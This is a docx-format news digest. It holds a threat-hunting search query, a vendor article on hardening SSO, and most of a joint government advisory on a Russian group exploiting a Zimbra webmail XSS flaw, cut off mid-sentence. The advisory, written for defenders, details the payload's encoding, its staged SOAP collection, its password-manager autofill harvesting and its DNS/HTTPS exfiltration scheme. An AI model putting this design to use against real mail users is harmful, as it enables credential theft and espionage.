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1B73" w:rsidRDefault="00EB1B73" w:rsidP="001D782D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB1B73">
        <w:t>("phishing" | "spear phishing" | "malicious email" | "email attachment" | "fake IT support") &amp; ("credential theft" | "credential access" | "credential dumping" | "stolen credentials" | "account compromise") AND ("lateral movement" | "domain controller" | "Active Directory" | "internal network" | "privilege escalation") &amp; (Windows | workstation | Rendpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Is Your SSO Protected Against Modern Credential Attacks?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by Specops Software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July 28, 2026 10:00 AM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Single sign on (SSO) simplifies access by letting users log into multiple systems with one set of credentials. While this delivers clear benefits to the authentication process, that convenience can also concentrate risk, as the 2025 University of Pennsylvania breach showed.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reports, attackers compromised a PennKey SSO account and used that access to reach internal systems including VPN, Salesforce, Qlik, SAP, and SharePoint. The attack also resulted in the theft of data on 1.2 million individuals.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does not mean SSO is insecure. When it is configured and protected properly, SSO can improve security by reducing password sprawl, centralizing access policies, and making it easier to enforce multi-factor authentication (MFA).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organizations can only enjoy those benefits when SSO is treated as a critical security control. If one login opens the door to multiple systems, that login needs robust protection.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 is your SSO login protected enough? To answer that, organizations need to look beyond whether SSO is switched on, and focus on how it is secured. Start with strong SSO passwords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‘Implement strong passwords' isn't new advice, but it is especially crucial if one credential can unlock multiple systems. However, strong doesn't have to mean frustrating; after all, SSO is designed to reduce friction during authentication.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latest guidance from NIST puts the emphasis on length and usability, alongside screening for weak or compromised passwords. For scenarios where single-factor passwords are still acceptable, NIST recommends at least 15 characters.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Passwords used alongside MFA must be at least eight characters, and systems should allow users to create passwords up to 64 characters. NIST also says organizations should check new passwords against blocklists of commonly used, expected, or previously compromised passwords.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Just as importantly, NIST advises against some legacy password rules that still appear in many organizations. Mandatory complexity requirements and routine password resets can push users toward predictable patterns, such as changing one digit or adding a symbol at the end.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Secure your Active Directory passwords with Specops Password Policy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Verizon's Data Breach Investigation Report found stolen credentials are involved in 44.7% of breaches.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Effortlessly secure Active Directory with compliant password policies, blocking 6+ billion compromised passwords, boosting security, and slashing support hassles! Try it for free Add MFA, but make sure it can stand up to modern attacks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strong SSO password shouldn't be the only thing standing between an attacker and your applications. Infostealers have made it easier than ever for attackers to scrape passwords and other authentication information, and even passwords that meet regulatory requirements appear regularly in these logs.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MFA adds another layer of protection, making it harder for an attacker to turn a compromised password into a successful login. For SSO, MFA should be enforced consistently. That means applying it across users, apps, and access scenarios, rather than only enabling it for a handful of "high-risk" accounts.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also worth looking at the type of MFA in place. SMS codes and basic one-time passwords are better than passwords alone, but they are not the strongest option.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Where possible, organizations should move toward phishing-resistant methods such as FIDO2 security keys, WebAuthn, or passkeys, especially for privileged users and access to sensitive systems. Implement secure MFA with Specops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Solutions like Specops Secure Access help organizations defend against password attacks and includes support for SSO for SaaS applications via OIDC and SAML.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Alongside adding MFA to Windows Logon, RDP and VPN authentications, Specops Secure Access helps organizations manage user access from a single place, reducing the identity attack surface while satisfying regulatory audits and cyber insurance conditions.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Secure the assets behind the SSO login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Organizations also need to secure the assets that sit behind SSO and control how identity is issued, trusted, and delegated.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Start with IdP administrator accounts. These accounts can change authentication policies, add applications, add and reset users, and approve integrations. They should be protected with phishing-resistant MFA, separate admin accounts, just-in-time access, and close monitoring.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Signing certificates and keys also need strict control. SAML certificates and token-signing keys are what allow applications to trust the identity provider. If they are exposed or misused, attackers may be able to impersonate users or abuse trusted sessions. Access should be tightly limited, changes should trigger alerts, and certificates should be rotated before they expire.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OAuth secrets and credentials deserve the same attention. Client secrets, app credentials, and refresh tokens can give attackers long-lived access, sometimes without another interactive login. Store them in a secrets vault, rotate them regularly, and review app registrations for excessive permissions.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Finally, review consent grants and delegated permissions. Attackers often look for ways to maintain access after the initial compromise, and risky third-party app permissions can give them that route. Restrict user consent, require admin approval for sensitive permissions, and remove stale or overprivileged grants. Is SSO secure?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SSO is still worth using, provided it is implemented and protected properly. The benefit for users is simple: access becomes easier. They don't have to remember separate passwords for every application or keep resetting forgotten credentials.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most cases, SSO lets them sign in once and move between connected resources without unnecessary friction.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also helps the service desk, as fewer forgotten passwords and account lockouts mean fewer support tickets, giving IT teams more time to focus on higher-value work.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From a security perspective, SSO gives organizations a central place to manage authentication. Applications do not need to handle the user's password directly, instead relying on trusted authentication tokens from the identity provider. This reduces password exposure across different services and gives security teams one place to enforce controls such as MFA, conditional access, logging, and account revocation.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SSO can also speed up access to business-critical resources. When users do not need to enter credentials for every tool, they can get to the systems they need faster and with less disruption.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are compliance benefits too. Centralized access management makes it easier to support reporting, auditing, strong authentication requirements, and rapid access removal when users leave or roles change.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SSO will not cover every sign-in scenario, and it is not secure by default. But when it is hardened properly, it can improve the user experience, reduce helpdesk pressure, strengthen security, and make access easier to govern. Ensure your SSO is secure with Specops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security of SSO environments currently depends heavily on credential strength, so it's crucial that policies enforce strong passwords. Specops helps here with Specops Password Policy, helping organizations simplify policy management and continuously block over 6 billion unique compromised passwords.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Specops Secure Access then extends that protection by applying MFA to SAML and OIDC-based applications, including those federated through third-party identity providers.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If you're interested in seeing how we can help strengthen the security of your SSO environment, contact us today or book a demo.</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and written by Specops Software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2026.07.28 18:57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/is-your-sso-protected-against-modern-credential-attacks/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite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Release Date July 23, 2026</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Alert Code AA26-204A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Cyber Threats and Response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Executive summary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group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group's activity is tracked in the cybersecurity community under several names (see Cybersecurity industry tracking), primarily as "LAUNDRY BEAR," a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [1].</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LAUNDRY BEAR's targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>relied on unsophisticated initial access techniques- including password spraying, phishing, and pass-the-cookie-allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) CVE-2025-66376, was patched in November 2025. This demonstrates LAUNDRY BEAR's intent and ability to deploy increasingly sophisticated technical capabilities.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Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR's latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim's last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the Persistence and credential access section.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Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors' continued success. The CSA is being released by the following authoring and co-sealing agencies: United States National Security Agency (NSA) United States Federal Bureau of Investigation (FBI) Netherlands Defence Intelligence and Security Service (MIVD) Netherlands General Intelligence and Security Service (AIVD) United States Cybersecurity and Infrastructure Security Agency (CISA) United States Defense Counterintelligence and Security Agency (DCSA) United States Department of Defense Cyber Crime Center (DC3) United States Department of the Treasury United States Naval Criminal Investigative Service (NCIS) Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) Communications Security Establishment Canada's (CSE's) Canadian Centre for Cyber Security (Cyber Centre) New Zealand National Cyber Security Centre (NCSC-NZ) United Kingdom National Cyber Security Centre (NCSC-UK) Czech Republic National Cyber and Information Security Agency (N'UKIB)1 Danish Defence Intelligence Service (DDIS)2 Estonian Foreign Intelligence Service (EFIS)3 Finnish Defence Intelligence (FDI)4 Finnish Security and Intelligence Service (SUPO)5 French General Directorate for Internal Security (DGSI)6 French National Cybersecurity Agency (ANSSI)7 Italian External Intelligence and Security Agency (AISE)8 Italian Internal Intelligence and Security Agency (AISI)9 Security and Intelligence Service of the Republic of Moldova (SIS RM)10 Polish Foreign Intelligence Agency (AW)11 The Military Counterintelligence Service of Poland (SKW)12 Spain National Intelligence Centre (CNI)13 Sweden National Cyber Security Centre (NCSC-SE)14</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authoring agencies urge any organizations using ZCS to implement the recommendations listed within the Mitigations section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed Indicators of compromise (IOCs).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 more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.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a downloadable list of IOCs, see: AA26-204A.stix.xml (STIX XML) AA26-204A.stix.json (STIX JSON) Cybersecurity industry tracking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cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community: LAUNDRY BEAR Void Blizzard [2] CL-STA-1114 [3] TA488 (formerly UNK_PitStop) [4]</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Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government's understanding for all activity related to these groupings. Background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Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [1] [2]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.</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May 2025 advisories highlighted a cluster of activity targeting cloud- based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [T1114.002]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [T1078], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR's modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user's credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [T1557].</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Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [T1587.001] named "Улей" or "Ulej" (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [T1114]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included: Last 90 days of emails, Email address, Password [T1589.001], Global Address List (GAL) [T1087], Two-factor authentication (2FA) tokens, and Newly-created Application Passcode [T1098].</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covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group's involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first-both as a priority target and as a testbench for malicious cyber techniques before broader global deployment. Targeting details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LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with: the Defense Industrial Base (DIB), the federal and local government, education, energy, law enforcement, media, non-governmental organizations, and technology. Technical details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Note:This advisory uses theMITRE ATT&amp;CK(R)Matrix for Enterpriseframework, version 19.This advisory also uses MITRE D3FENDTM version 1.4.015. See Appendix A and Appendix B for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.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Ulej is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit CVE-2025-66376 [Common Weakness Enumeration (CWE) CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim's system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [T1074.002] running LAUNDRY BEAR's "Flowerbed" collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention. Reconnaissance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LAUNDRY BEAR uses the Ulej capability to exploit the CVE-2025-66376 vulnerability in organizations using ZCS. This campaign's targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [T1595] and fingerprinting datasets easily procured through various commercial vendors [T1596.005].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identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [T1589.002] from datasets offered by commercial vendors [T1597.002], open source intelligence [T1593], or previously exfiltrated data [T1597]. Resource development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actors procure VPSs from a variety of providers [T1583.003], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [T1583] when interacting with these servers, further demonstrating the group's intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for Ulej's Flowerbed framework [T1608], which then receives and aggregates the data Ulej exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure. Flowerbed framework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Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers: Catcher, Certbot, Nginx, and Gardener.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Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [T1048]. For additional information on Catcher, refer to the Exfiltration section of this advisory. Flowerbed's next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let's Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [T1048.002]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains "*.i.*" prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.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simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [T1588.007]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [T1588.002], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities. Initial access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To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [T1566]. Through exploitation of CVE-2025- 66376, this JavaScript payload is immediately executed once the user views the malicious email [T1203], such as the one shown in Figure 1, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>compromised accounts [T1199], as shown in the email metadata in Figure 2. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.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 Example of malicious email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2: Headers from an example malicious email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the National Vulnerability Database (NVD), CVE-2025-66376 was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet's (CSS) @import directives within an email [5]. Because the activity attributed to this campaign began in July 2025-months before Synacor released a patch and the CVE was published-the payload initially exploited a zero-day vulnerability at that time [T1587.004].</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Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.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Hidden in LAUNDRY BEAR's email is a Base64 encoded payload within the "onload" field of a Scalable Vector Graphics (SVG) element [T1027.017], as shown in Figure 3. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage CVE-2025-66376. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see Figure 3) [T1027.013]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [T1027.010], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [T1119]. The stages in order of appearance within the payload are as follows: sendStartPing, gather_email, gather_environment, gather_2fa_codes, gather_app_password, gather_device_status, gather_oauth_consumers, gather_autocomplete_password, enable_mail_protocols, gather_gal, sendArchives, and sendFinishPing.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3: Malicious payload of example email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Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [T1587]. Persistence and credential access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 establish sustained persistence into the victim's email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the Exfiltration section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group's ability to circumvent multi- factor authentication through session token replay [T1550.004], and the Zimbra campaign follows a similar trend.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script used in this campaign tries to discover the victim's email address during the gather_email stage [T1087]. The script searches for this email address in two ways. First, it examines the batchInfoResponse variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the Collection section of this advisory. If so, the script uses the "GetIdentitiesRequest" Simple Object Access Protocol (SOAP) command under the "ZimbraAccount" namespace to determine the victim's email address [T1185] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim's email, the script sends a JavaScript Object Notation (JSON) payload with a key of "email" and value of null over HTTPS and does not attempt DNS exfiltration.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During the gather_autocomplete_password stage, the script attempts to collect the victim's saved password via the autocomplete feature of the victim's password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim's view, as shown in Figure 4 and Figure 5. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in Figure 4. If there is no value in that input field, it checks the password input field shown in Figure 5. If neither input field contains a value, a JSON payload with a key of "autocomplete_password" and value of null is sent over HTTPS and DNS exfiltration is not attempted.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4: First illegitimate login HTML element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5: Second illegitimate login HTML element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LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim's mailbox. During the enable_mail_protocols stage, a SOAP request leveraging the "ModifyPrefsRequest" command under the "ZimbraAccount" namespace is sent. This request attempts to set the "zimbraPrefImapEnabled" preference to TRUE. While the default setting for "zimbraPrefImapEnabled" is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim's mailbox is enabled.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ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the gather_app_password stage, the script makes a SOAP request using the "CreateAppSpecificPasswordRequest" command under the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"ZimbraAccount" namespace to create a new Application Passcode [T1556.006]. The SOAP request uses "ZimbraWeb" as the name of the application.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Additionally, the script also attempts to collect 2FA tokens. During the gather_2fa_codes stage, the script makes a SOAP request using the "GetScratchCodesRequest" command under the "ZimbraAccount" namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually. Collection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 demonstrated in the Persistence and credential access section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim's current CSRF token, which it attempts to access within the webpage's local storage using localStorage.getItem("csrfToken"). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the Persistence and credential access section, other SOAP commands executed to collect victim information are shown in Table 1.</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 Additional SOAP commands used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SOAP Command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Namespace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Stage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GetInfoRequest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zimbraAccount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gather_environment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GetDeviceStatusRequest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zimbraSync</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gather_device_status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GetOAuthConsumersRequest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zimbraAccount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gather_oauth_consumers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SearchGalRequest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zimbraAccount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gather_gal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script attempts to collect the victim's GAL through brute force by searching for each two-character combination from a character set of "abcdefghijklmnopqrstuvwxyz1234567890.-_". These queries are conducted using 20 batches of SOAP requests with 77 "SearchGalRequest" SOAP commands in each batch except for the last request containing only 58.</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During the gather_environment stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user's current URL to determine the client type being used, checking for certain indicators (shown in Table 2) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.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2: ZCS webmail client types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Indicator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Client Type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Associated Value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?client=advanced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Advanced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Standard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/modern/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Modern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 part of collection, the script attempts to harvest any emails not marked as "junk" from the last 90 days from the victim's account. Emails are collected daily by an HTTP GET request to the URL path, "/home/~/?fmt=tgz&amp;meta=0&amp;query=date:-{DAY_OFFSET}d AND (not in:junk)". The {DAY_OFFSET} value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of zd_comp_YYYY-MM-DD, and value of true, is saved to the window.top.localStorage property. This variable is saved regardless of whether the email is successfully exfiltrated.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Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a {DAY_OFFSET} of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the Exfiltration section.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The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the Exfiltration section below. For cases where the error occurs within a SOAP request, ":api" is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of gather_gal:{VAL}:api. The {VAL} placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use "gather_autocomplete_password:dom" for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day's emails, the stage will include which day the error occurred on, using the previously defined placeholder {DAY_OFFSET}, with a format of sendArchive:day-{DAY_OFFSET}. Exfiltration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At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [T1048.003] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.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Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration. DNS exfiltration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DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor- controlled DNS infrastructure, Ulej maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (".") is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in Figure 6. Any traffic involving DNS exfiltration will have "d-" prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.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6: Structure for information exfiltrated by DNS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When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. Table 3 lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries.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3: DNS exfiltration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Type of Information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Exfiltration Stage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Data Type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Victim's Email Address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gather_email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Client Type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gather_environment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Zimbra Version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gather_environment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URL at Time of Exploitation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gather_environment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url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2FA Scratch Codes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gather_2fa_codes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2fa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Newly Created Application Password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gather_app_password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Harvested Autocomplete Password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gather_autocomplete_password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pw HTTPS exfiltration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Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let's Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim's environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in Table 4. Traffic associated with HTTPS exfiltration will use the URL scheme shown in Figure 7.</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4: HTTPS exfiltration types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Content Type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URL Path</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application/json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/v/p</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application/octet-stream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7: Structure for information exfiltrated by HTTPS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of the data transmitted via HTTPS uses the standard JSON content type format. The script includes the information in a POST request to actor- controlled infrastructure.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5 provides a summary of the JSON-based exfiltration.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5: HTTPS JSON exfiltration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Type of Information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Exfiltration Stage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JSON Key(s)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Victim's Email Address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gather_email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email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Client Type, Version, and Current URL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gather_environment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client, version, full_url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Newly Created Application Password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gather_app_password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app_password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Harvested Autocomplete Password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gather_autocomplete_password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autocomplete_password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script transmits all HTTPS exfiltration not identified in Table 5 using the Octet-Stream content type as binary data. The POST requests for this method include a filename in the "X-Filename" header. Traditionally, developers use headers prefixed with "X-" to denote custom headers that do not follow a defined standard. The purpose of including this header remains unclear since the Catcher capability ignores the provided filename when saving the data. Table 6 summarizes the data exfiltrated in this format.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6: HTTPS binary exfiltration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Type of Information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Exfiltration Stage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X-Filename Header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SOAP request for GetInfoRequest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gather_environment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zimbra_batch_analytics.json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SOAP request for GetScratchCodesRequest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gather_2fa_codes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zimbra_batch_analytics.json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SOAP request for GetDeviceStatusRequest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gather_device_status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zimbra_batch_analytics.json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SOAP request for GetOAuthConsumersRequest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gather_oauth_consumers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zimbra_batch_analytics.json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Victim Organization's Global Address List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gather_gal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telemetry_{1-20}.json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Last 90 Days of Victim's Emails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sendArchives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telemetryData_{0-89}.json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script sends all exfiltrated data identified in Table 6 to the Catcher service exactly as received from the SOAP request in a JSON payload, except for email exfiltration. For email exfiltration, the script sends it as a GZIP compressed archive [T1560]. Although most of the exfiltration consists of valid JSON, the script still attempts to exfiltrate all information identified in Table 6 using the application/octet-stream content typing rather than application/json.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At the beginning and end of the collection and exfiltration activity, during the sendStartPing and sendFinishPing stages respectively, the script submits a POST request with a JSON payload to indicate that the script is starting or finishing execution. Throughout execution, the script also logs error events and send the logs using similar JSON payloads. The script sends the JSON in a POST request to the URL 